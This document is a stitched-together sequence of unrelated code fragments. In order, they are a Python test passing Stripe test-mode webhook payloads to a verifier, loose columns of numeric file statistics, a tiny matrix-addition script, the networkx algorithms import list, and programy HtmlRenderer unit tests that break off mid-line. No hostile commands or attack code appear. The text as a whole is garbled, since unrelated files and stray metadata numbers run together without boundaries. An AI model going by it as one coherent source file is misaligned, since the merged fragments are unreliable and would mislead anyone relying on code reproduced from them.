"refunds": {"object": "list", "data": [], "has_more": false, "total_count": 0, "url": "/v1/charges/ch_1FZp48Hv0Y0PURSq0buZ6d6f/refunds"}, "review": null, "shipping": null, "source": {"id": "card_1FZp48Hv0Y0PURSqsmipr0Rv", "object": "card", "address_city": null, "address_country": null, "address_line1": null, "address_line1_check": null, "address_line2": null, "address_state": null, "address_zip": null, "address_zip_check": null, "brand": "Visa", "country": "US", "customer": null, "cvc_check": null, "dynamic_last4": null, "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "last4": "4242", "metadata": {}, "name": null, "tokenization_method": null}, "source_transfer": null, "statement_descriptor": null, "statement_descriptor_suffix": null, "status": "succeeded", "transfer_data": null, "transfer_group": null}}, "livemode": false, "pending_webhooks": 3, "request": {"id": "req_fGRGYYasLgdcRq", "idempotency_key": null}, "type": "charge.succeeded" }""" stripe_api.webhook_api.verify("unique_signature", body) mock_generic_func.assert_called_once_with( event="charge.succeeded", data={ "id": "ch_1FZp48Hv0Y0PURSq0buZ6d6f", "amount": 20.0, "currency": "usd", "customer": None, "payment_details": { "brand": "visa", "checks": { "address_line1_check": None, "address_postal_code_check": None, "cvc_check": None, }, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "installments": None, "last4": "4242", "network": "visa", "three_d_secure": None, "wallet": None, }, "status": "succeeded", "amount_refunded": 0, "failure": {}, "outcome": { "network_status": "approved_by_network", "reason": None, "risk_level": "normal", "risk_score": 42, "seller_message": "Payment complete.", "type": "authorized", }, }, ) def test_failed_payment_transfer(mock_generic_func, stripe_api): body = """ {"id": "evt_1FZpYhHv0Y0PURSqOU8uvKJD", "object": "event", "api_version": "2019-03-14", "created": 1572574095, "data": {"object": {"id": "ch_1FZpYhHv0Y0PURSqnaxbrowv", "object": "charge", "amount": 2000, "amount_refunded": 0, "application": null, "application_fee": null, "application_fee_amount": null, "balance_transaction": null, "billing_details": {"address": {"city": null, "country": null, "line1": null, "line2": null, "postal_code": null, "state": null}, "email": null, "name": null, "phone": null}, "captured": false, "created": 1572574095, "currency": "usd", "customer": null, "description": null, "destination": null, "dispute": null, "failure_code": "card_declined", "failure_message": "Your card was declined.", "fraud_details": {}, "invoice": null, "livemode": false, "metadata": {}, "on_behalf_of": null, "order": null, "outcome": {"network_status": "declined_by_network", "reason": "generic_decline", "risk_level": "normal", "risk_score": 55, "seller_message": "The bank did not return any further details with this decline.", "type": "issuer_declined"}, "paid": false, "payment_intent": null, "payment_method": "card_1FZpYhHv0Y0PURSqJWu9ppxe", "payment_method_details": {"card": {"brand": "visa", "checks": {"address_line1_check": null, "address_postal_code_check": null, "cvc_check": null}, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "invoLvA3S2339Hlz", "funding": "credit", "installments": null, "last4": "0002", "network": "visa", "three_d_secure": null, "wallet": null}, "type": "card"}, "receipt_email": null, "receipt_number": null, "receipt_url": "https://pay.stripe.com/receipts/acct_1EJOOLHv0Y0PURSq/ch_1FZpYhHv0Y0PURSqnaxbrowv/rcpt_G61bfiwujEVbmBleDeprVDK1Z4eXnCX", "refunded": false, "refunds": {"object": "list", "data": [], "has_more": false, "total_count": 0, "url": "/v1/charges/ch_1FZpYhHv0Y0PURSqnaxbrowv/refunds"}, "review": null, "shipping": null, "source": {"id": "card_1FZpYhHv0Y0PURSqJWu9ppxe", "object": "card", "address_city": null, "address_country": null, "address_line1": null, "address_line1_check": null, "address_line2": null, "address_state": null, "address_zip": null, "address_zip_check": null, "brand": "Visa", "country": "US", "customer": null, "cvc_check": null, "dynamic_last4": null, "exp_month": 11, "exp_year": 2020, "fingerprint": "invoLvA3S2339Hlz", "funding": "credit", "last4": "0002", "metadata": {}, "name": null, "tokenization_method": null}, "source_transfer": null, "statement_descriptor": null, "statement_descriptor_suffix": null, "status": "failed", "transfer_data": null, "transfer_group": null}}, "livemode": false, "pending_webhooks": 3, "request": {"id": "req_t91WTWN0dgrmmJ", "idempotency_key": null}, "type": "charge.failed"} """ stripe_api.webhook_api.verify("unique_signature", body) mock_generic_func.assert_called_once_with( event="charge.failed", data={ "id": "ch_1FZpYhHv0Y0PURSqnaxbrowv", "amount": 20.0, "currency": "usd", "customer": None, "payment_details": { "brand": "visa", "checks": { "address_line1_check": None, "address_postal_code_check": None, "cvc_check": None, }, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "invoLvA3S2339Hlz", "funding": "credit", "installments": None, "last4": "0002", "network": "visa", "three_d_secure": None, "wallet": None, }, "status": "failed", "amount_refunded": 0, "failure": {"code": "card_declined", "message": "Your card was declined."}, "outcome": { "network_status": "declined_by_network", "reason": "generic_decline", "risk_level": "normal", "risk_score": 55, "seller_message": "The bank did not return any further details with this decline.", "type": "issuer_declined", }, }, ) def test_refund_payment(mock_generic_func, stripe_api): body = """{ "id": "evt_1FZpUiHv0Y0PURSq6ht36S8d", "object": "event", "api_version": "2019-03-14", "created": 1572573848, "data": {"object": {"id": "ch_1FZpUgHv0Y0PURSqfcRHxRDP", "object": "charge", "amount": 2000, "amount_refunded": 2000, "application": null, "application_fee": null, "application_fee_amount": null, "balance_transaction": "txn_1FZpUgHv0Y0PURSqadIi9xwK", "billing_details": {"address": {"city": null, "country": null, "line1": null, "line2": null, "postal_code": null, "state": null}, "email": null, "name": null, "phone": null}, "captured": true, "created": 1572573846, "currency": "usd", "customer": null, "description": null, "destination": null, "dispute": null, "failure_code": null, "failure_message": null, "fraud_details": {}, "invoice": null, "livemode": false, "metadata": {}, "on_behalf_of": null, "order": null, "outcome": {"network_status": "approved_by_network", "reason": null, "risk_level": "normal", "risk_score": 51, "seller_message": "Payment complete.", "type": "authorized"}, "paid": true, "payment_intent": null, "payment_method": "card_1FZpUgHv0Y0PURSqykuRPITN", "payment_method_details": {"card": {"brand": "visa", "checks": {"address_line1_check": null, "address_postal_code_check": null, "cvc_check": null}, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "installments": null, "last4": "4242", "network": "visa", "three_d_secure": null, "wallet": null}, "type": "card"}, "receipt_email": null, "receipt_number": null, "receipt_url": "https://pay.stripe.com/receipts/acct_1EJOOLHv0Y0PURSq/ch_1FZpUgHv0Y0PURSqfcRHxRDP/rcpt_G61XPmyNekRgoLd7Rgm626Yg0niyGmu", "refunded": true, "refunds": {"object": "list", "data": [{"id": "re_1FZpUhHv0Y0PURSqAcxHxT8r", "object": "refund", "amount": 2000, "balance_transaction": "txn_1FZpUhHv0Y0PURSqFGxqIJ5D", "charge": "ch_1FZpUgHv0Y0PURSqfcRHxRDP", "created": 1572573847, "currency": "usd", "metadata": {}, "reason": null, "receipt_number": null, "source_transfer_reversal": null, "status": "succeeded", "transfer_reversal": null}], "has_more": false, "total_count": 1, "url": "/v1/charges/ch_1FZpUgHv0Y0PURSqfcRHxRDP/refunds"}, "review": null, "shipping": null, "source": {"id": "card_1FZpUgHv0Y0PURSqykuRPITN", "object": "card", "address_city": null, "address_country": null, "address_line1": null, "address_line1_check": null, "address_line2": null, "address_state": null, "address_zip": null, "address_zip_check": null, "brand": "Visa", "country": "US", "customer": null, "cvc_check": null, "dynamic_last4": null, "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "last4": "4242", "metadata": {}, "name": null, "tokenization_method": null}, "source_transfer": null, "statement_descriptor": null, "statement_descriptor_suffix": null, "status": "succeeded", "transfer_data": null, "transfer_group": null}, "previous_attributes": {"amount_refunded": 0, "refunded": false, "refunds": {"data": [], "total_count": 0}}}, "livemode": false, "pending_webhooks": 3, "request": {"id": "req_I1sL6KvveyA7Bp", "idempotency_key": null}, "type": "charge.refunded"} """ stripe_api.webhook_api.verify("unique_signature", body) mock_generic_func.assert_called_once_with( event="charge.refunded", data={ "id": "ch_1FZpUgHv0Y0PURSqfcRHxRDP", "amount": 20.0, "currency": "usd", "customer": None, "payment_details": { "brand": "visa", "checks": { "address_line1_check": None, "address_postal_code_check": None, "cvc_check": None, }, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "installments": None, "last4": "4242", "network": "visa", "three_d_secure": None, "wallet": None, }, "status": "succeeded", "amount_refunded": 20.0, "failure": {}, "outcome": { "network_status": "approved_by_network", "reason": None, "risk_level": "normal", "risk_score": 51, "seller_message": "Payment complete.", "type": "authorized", }, }, )
72.333333
2,284
0.594959
1,397
14,322
5.848962
0.161775
0.032309
0.018725
0.014319
0.777016
0.74691
0.738343
0.73614
0.694774
0.676784
0
0.043153
0.234674
14,322
197
2,285
72.700508
0.702308
0
0
0.521978
0
0.043956
0.743646
0.124885
0
0
0
0
0.016484
1
0.038462
false
0
0.021978
0
0.065934
0.038462
0
0
0
null
0
0
0
0
1
1
1
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2dbe986f44159abd59f294917bf3bfce93f5279a
235
py
Python
Chapter02/add_matrix_elements.py
aaltopiiri/-The-Python-Workshop
42e41198a109a19f39a4c545cdb830851c41b0a1
[ "MIT" ]
null
null
null
Chapter02/add_matrix_elements.py
aaltopiiri/-The-Python-Workshop
42e41198a109a19f39a4c545cdb830851c41b0a1
[ "MIT" ]
null
null
null
Chapter02/add_matrix_elements.py
aaltopiiri/-The-Python-Workshop
42e41198a109a19f39a4c545cdb830851c41b0a1
[ "MIT" ]
null
null
null
x = [[1, 2, 3],[4, 5, 6],[7, 8, 9]] y = [[10, 11, 12],[13, 14, 15],[16, 17, 18]] z = [[0, 0, 0],[0, 0, 0],[0, 0, 0]] for i in range(len(x)): for j in range (len(x[i])): z[i][j]=x[i][j]+y[i][j] print(z[i][j],end=' ')
33.571429
44
0.382979
57
235
1.578947
0.526316
0.177778
0.233333
0.266667
0.1
0.1
0.1
0.1
0
0
0
0.20339
0.246809
235
7
45
33.571429
0.305085
0
0
0
0
0
0.004237
0
0
0
0
0
0
1
0
false
0
0
0
0
0.142857
0
0
1
null
0
1
1
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2dc01011d7304f6979cd6be6254e73853533b3d8
6,318
py
Python
networkx/algorithms/__init__.py
SultanOrazbayev/networkx
5be9755636fa4da71da2e28f8467336d3c0164a7
[ "BSD-3-Clause" ]
10,024
2015-01-01T13:06:43.000Z
2022-03-31T12:45:25.000Z
networkx/algorithms/__init__.py
SultanOrazbayev/networkx
5be9755636fa4da71da2e28f8467336d3c0164a7
[ "BSD-3-Clause" ]
3,191
2015-01-01T18:13:11.000Z
2022-03-31T22:06:00.000Z
networkx/algorithms/__init__.py
SultanOrazbayev/networkx
5be9755636fa4da71da2e28f8467336d3c0164a7
[ "BSD-3-Clause" ]
3,272
2015-01-01T05:04:53.000Z
2022-03-31T17:46:35.000Z
from networkx.algorithms.assortativity import * from networkx.algorithms.asteroidal import * from networkx.algorithms.boundary import * from networkx.algorithms.bridges import * from networkx.algorithms.chains import * from networkx.algorithms.centrality import * from networkx.algorithms.chordal import * from networkx.algorithms.cluster import * from networkx.algorithms.clique import * from networkx.algorithms.communicability_alg import * from networkx.algorithms.components import * from networkx.algorithms.coloring import * from networkx.algorithms.core import * from networkx.algorithms.covering import * from networkx.algorithms.cycles import * from networkx.algorithms.cuts import * from networkx.algorithms.d_separation import * from networkx.algorithms.dag import * from networkx.algorithms.distance_measures import * from networkx.algorithms.distance_regular import * from networkx.algorithms.dominance import * from networkx.algorithms.dominating import * from networkx.algorithms.efficiency_measures import * from networkx.algorithms.euler import * from networkx.algorithms.graphical import * from networkx.algorithms.hierarchy import * from networkx.algorithms.hybrid import * from networkx.algorithms.link_analysis import * from networkx.algorithms.link_prediction import * from networkx.algorithms.lowest_common_ancestors import * from networkx.algorithms.isolate import * from networkx.algorithms.matching import * from networkx.algorithms.minors import * from networkx.algorithms.mis import * from networkx.algorithms.moral import * from networkx.algorithms.non_randomness import * from networkx.algorithms.operators import * from networkx.algorithms.planarity import * from networkx.algorithms.planar_drawing import * from networkx.algorithms.reciprocity import * from networkx.algorithms.regular import * from networkx.algorithms.richclub import * from networkx.algorithms.shortest_paths import * from networkx.algorithms.similarity import * from networkx.algorithms.graph_hashing import * from networkx.algorithms.simple_paths import * from networkx.algorithms.smallworld import * from networkx.algorithms.smetric import * from networkx.algorithms.structuralholes import * from networkx.algorithms.sparsifiers import * from networkx.algorithms.summarization import * from networkx.algorithms.swap import * from networkx.algorithms.traversal import * from networkx.algorithms.triads import * from networkx.algorithms.vitality import * from networkx.algorithms.voronoi import * from networkx.algorithms.wiener import * # Make certain subpackages available to the user as direct imports from # the `networkx` namespace. from networkx.algorithms import approximation from networkx.algorithms import assortativity from networkx.algorithms import bipartite from networkx.algorithms import node_classification from networkx.algorithms import centrality from networkx.algorithms import chordal from networkx.algorithms import cluster from networkx.algorithms import clique from networkx.algorithms import components from networkx.algorithms import connectivity from networkx.algorithms import community from networkx.algorithms import coloring from networkx.algorithms import flow from networkx.algorithms import isomorphism from networkx.algorithms import link_analysis from networkx.algorithms import lowest_common_ancestors from networkx.algorithms import operators from networkx.algorithms import shortest_paths from networkx.algorithms import tournament from networkx.algorithms import traversal from networkx.algorithms import tree # Make certain functions from some of the previous subpackages available # to the user as direct imports from the `networkx` namespace. from networkx.algorithms.bipartite import complete_bipartite_graph from networkx.algorithms.bipartite import is_bipartite from networkx.algorithms.bipartite import project from networkx.algorithms.bipartite import projected_graph from networkx.algorithms.connectivity import all_pairs_node_connectivity from networkx.algorithms.connectivity import all_node_cuts from networkx.algorithms.connectivity import average_node_connectivity from networkx.algorithms.connectivity import edge_connectivity from networkx.algorithms.connectivity import edge_disjoint_paths from networkx.algorithms.connectivity import k_components from networkx.algorithms.connectivity import k_edge_components from networkx.algorithms.connectivity import k_edge_subgraphs from networkx.algorithms.connectivity import k_edge_augmentation from networkx.algorithms.connectivity import is_k_edge_connected from networkx.algorithms.connectivity import minimum_edge_cut from networkx.algorithms.connectivity import minimum_node_cut from networkx.algorithms.connectivity import node_connectivity from networkx.algorithms.connectivity import node_disjoint_paths from networkx.algorithms.connectivity import stoer_wagner from networkx.algorithms.flow import capacity_scaling from networkx.algorithms.flow import cost_of_flow from networkx.algorithms.flow import gomory_hu_tree from networkx.algorithms.flow import max_flow_min_cost from networkx.algorithms.flow import maximum_flow from networkx.algorithms.flow import maximum_flow_value from networkx.algorithms.flow import min_cost_flow from networkx.algorithms.flow import min_cost_flow_cost from networkx.algorithms.flow import minimum_cut from networkx.algorithms.flow import minimum_cut_value from networkx.algorithms.flow import network_simplex from networkx.algorithms.isomorphism import could_be_isomorphic from networkx.algorithms.isomorphism import fast_could_be_isomorphic from networkx.algorithms.isomorphism import faster_could_be_isomorphic from networkx.algorithms.isomorphism import is_isomorphic from networkx.algorithms.tree.branchings import maximum_branching from networkx.algorithms.tree.branchings import maximum_spanning_arborescence from networkx.algorithms.tree.branchings import minimum_branching from networkx.algorithms.tree.branchings import minimum_spanning_arborescence from networkx.algorithms.tree.branchings import ArborescenceIterator from networkx.algorithms.tree.coding import * from networkx.algorithms.tree.decomposition import * from networkx.algorithms.tree.mst import * from networkx.algorithms.tree.operations import * from networkx.algorithms.tree.recognition import *
48.976744
77
0.868154
779
6,318
6.93068
0.17715
0.271161
0.497129
0.311169
0.453973
0.308576
0.25727
0.123727
0.03334
0.03334
0
0
0.083571
6,318
128
78
49.359375
0.93247
0.035929
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2ddd7cf54ece7ec7f6ee4e0d74edd7c41af92128
24
py
Python
elones/__init__.py
nestorp/claim-diff_elones
3fe2c41fd39064d3fd210220d921ccf11e62880a
[ "MIT" ]
null
null
null
elones/__init__.py
nestorp/claim-diff_elones
3fe2c41fd39064d3fd210220d921ccf11e62880a
[ "MIT" ]
null
null
null
elones/__init__.py
nestorp/claim-diff_elones
3fe2c41fd39064d3fd210220d921ccf11e62880a
[ "MIT" ]
null
null
null
from elones.elo import *
24
24
0.791667
4
24
4.75
1
0
0
0
0
0
0
0
0
0
0
0
0.125
24
1
24
24
0.904762
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
932d3793483ebd52c5ee38df69cd292616dd870c
37
py
Python
napari/_qt/layers/__init__.py
OKaluza/napari
95a6afbbdb54a530b1eaca23037b8f98c7c8b064
[ "BSD-3-Clause" ]
null
null
null
napari/_qt/layers/__init__.py
OKaluza/napari
95a6afbbdb54a530b1eaca23037b8f98c7c8b064
[ "BSD-3-Clause" ]
4
2019-12-08T20:20:44.000Z
2020-01-16T21:57:33.000Z
napari/_qt/layers/__init__.py
OKaluza/napari
95a6afbbdb54a530b1eaca23037b8f98c7c8b064
[ "BSD-3-Clause" ]
null
null
null
from .util import create_qt_controls
18.5
36
0.864865
6
37
5
1
0
0
0
0
0
0
0
0
0
0
0
0.108108
37
1
37
37
0.909091
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
9332f75cb33857029582335c48fdabe5a50b32cd
18,900
py
Python
test/programytest/clients/render/test_html.py
cdoebler1/AIML2
ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a
[ "MIT" ]
345
2016-11-23T22:37:04.000Z
2022-03-30T20:44:44.000Z
test/programytest/clients/render/test_html.py
MikeyBeez/program-y
00d7a0c7d50062f18f0ab6f4a041068e119ef7f0
[ "MIT" ]
275
2016-12-07T10:30:28.000Z
2022-02-08T21:28:33.000Z
test/programytest/clients/render/test_html.py
VProgramMist/modified-program-y
f32efcafafd773683b3fe30054d5485fe9002b7d
[ "MIT" ]
159
2016-11-28T18:59:30.000Z
2022-03-20T18:02:44.000Z
import unittest import unittest.mock from programy.clients.render.html import HtmlRenderer class MockHtmlBotClient(object): def __init__(self): self._response = None self.configuration = unittest.mock.Mock() self.configuration.host = "127.0.0.1" self.configuration.port = "6666" self.configuration.api = "/api/web/v1.0/ask" def process_response(self, client_context, response): self._response = response class HtmlRendererTests(unittest.TestCase): def test_create_postback_url(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) postback = renderer.create_postback_url() self.assertIsNotNone(postback) self.assertEqual(postback, "#") def test_text_only(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "Hello world") self.assertEqual(mock_console._response, "Hello world") def test_url_button(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<button"><text>Hello</text><url>http://click.me</url></button>') self.assertEqual(mock_console._response, '<a class="programy" href="http://click.me">Hello</a>') def test_url_button_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<button class="class1" id="id1"><text>Hello</text><url>http://click.me</url></button>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" href="http://click.me">Hello</a>') def test_postback_button(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<button><text>Hello</text><postback>HELLO</postback></button>") self.assertEqual(mock_console._response, '<a class="programy" postback="HELLO" href="#">Hello</a>') def test_postback_button_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<button class="class1" id="id1"><text>Hello</text><postback>HELLO</postback></button>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" postback="HELLO" href="#">Hello</a>') def test_link(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<link><text>Hello</text><url>http://click.me</url></link>") self.assertEqual(mock_console._response, '<a class="programy" href="http://click.me">Hello</a>') def test_link_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<link class="class1" id="id1"><text>Hello</text><url>http://click.me</url></link>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" href="http://click.me">Hello</a>') def test_image(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '') self.assertEqual(mock_console._response, '<img class="programy" src="http://servusai.com/aiml.png" />') def test_image_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<image class="class1" id="id1">http://servusai.com/aiml.png</image>') self.assertEqual(mock_console._response, '<img class="class1 programy" id="id1" src="http://servusai.com/aiml.png" />') def test_video(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<video>http://servusai.com/aiml.mov</video>") self.assertEqual(mock_console._response, """<video class="programy" src="http://servusai.com/aiml.mov"> Sorry, your browser doesn't support embedded videos, but don't worry, you can <a href="http://servusai.com/aiml.mov">download it</a> and watch it with your favorite video player! </video>""") def test_video_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<video class="class1" id="id1">http://servusai.com/aiml.mov</video>') self.assertEqual(mock_console._response, """<video class="class1 programy" id="id1" src="http://servusai.com/aiml.mov"> Sorry, your browser doesn't support embedded videos, but don't worry, you can <a href="http://servusai.com/aiml.mov">download it</a> and watch it with your favorite video player! </video>""") def test_card(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>') self.assertEqual(mock_console._response, '<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>') def test_card_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<card class="class1" id="id1"><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>') self.assertEqual(mock_console._response, '<div class="class1 programy" id="id1"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>') def test_carousel(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<carousel><card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card></carousel>") self.assertEqual(mock_console._response, '<div class="programy"><div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div></div>') def test_carousel_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<carousel class="class1" id="id1"><card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card></carousel>') self.assertEqual(mock_console._response, '<div class="class1 programy" id="id1"><div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div></div>') def test_reply_with_postback(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<reply><text>Hello</text><postback>HELLO</postback></reply>") self.assertEqual(mock_console._response, '<a class="programy" postback="HELLO" href="#">Hello</a>') def test_reply_with_postback_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<reply class="class1" id="id1"><text>Hello</text><postback>HELLO</postback></reply>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" postback="HELLO" href="#">Hello</a>') def test_reply_without_postback(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<reply><text>Hello</text></reply>") self.assertEqual(mock_console._response, '<a class="programy" postback="Hello" href="#">Hello</a>') def test_reply_without_postback_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<reply class="class1" id="id1"><text>Hello</text></reply>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" postback="Hello" href="#">Hello</a>') def test_delay(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<delay><seconds>0</seconds></delay>") self.assertEqual(mock_console._response, '<div class="programy">...</div>') def test_delay_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<delay class="class1" id="id1" ><seconds>0</seconds></delay>') self.assertEqual(mock_console._response, '<div class="class1 programy" id="id1">...</div>') def test_split(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<split />") self.assertEqual(mock_console._response, '<br class="programy" />') def test_split_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<split class="class1" id="id1"/>') self.assertEqual(mock_console._response, '<br class="class1 programy" id="id1" />') def test_list(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<list><item>Item1</item><item>Item2</item></list>') self.assertEqual(mock_console._response, '<ul class="programy"><li>Item1</li><li>Item2</li></ul>') def test_list_with_children(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<list><item>Hi</item><item><button"><text>Hello</text><url>http://click.me</url></button></item><item><button"><text>Goodbye</text><url>http://click.me</url></button></item></list>') print(mock_console._response) self.assertEqual(mock_console._response, '<ul class="programy"><li>Hi</li><li><a class="programy" postback="Hello" href="#">Hello</a></li><li><a class="programy" postback="Goodbye" href="#">Goodbye</a></li></ul>') def test_list_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<list class="class1" id="id1"><item>Item1</item><item>Item2</item></list>') self.assertEqual(mock_console._response, '<ul class="class1 programy" id="id1"><li>Item1</li><li>Item2</li></ul>') def test_olist(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<olist><item>Item1</item><item>Item2</item></olist>") self.assertEqual(mock_console._response, '<ol class="programy"><li>Item1</li><li>Item2</li></ol>') def test_olist_with_children(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<olist><item>Hi</item><item><button"><text>Hello</text><url>http://click.me</url></button></item><item><button"><text>Goodbye</text><url>http://click.me</url></button></item></olist>') print(mock_console._response) self.assertEqual(mock_console._response, '<ol class="programy"><li>Hi</li><li><a class="programy" postback="Hello" href="#">Hello</a></li><li><a class="programy" postback="Goodbye" href="#">Goodbye</a></li></ol>') def test_olist_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<olist class="class1" id="id1"><item>Item1</item><item>Item2</item></olist>') self.assertEqual(mock_console._response, '<ol class="class1 programy" id="id1"><li>Item1</li><li>Item2</li></ol>') def test_location(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<location />") self.assertEqual(mock_console._response, "") def test_location(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<location />') self.assertEqual(mock_console._response, "") def test_location_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<location class="class1 programy" id="id1"/>') self.assertEqual(mock_console._response, "") def test_tts(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<tts>Some speech</tts>') self.assertEqual(rendered, '') def test_tts_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<tts class="class1 programy" id="id1">Some speech</tts>') self.assertEqual(rendered, '') def test_card_with_xml_at_front(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<something>Some speech</something><card><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>') self.assertEqual(rendered, '<something>Some speech</something><div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a 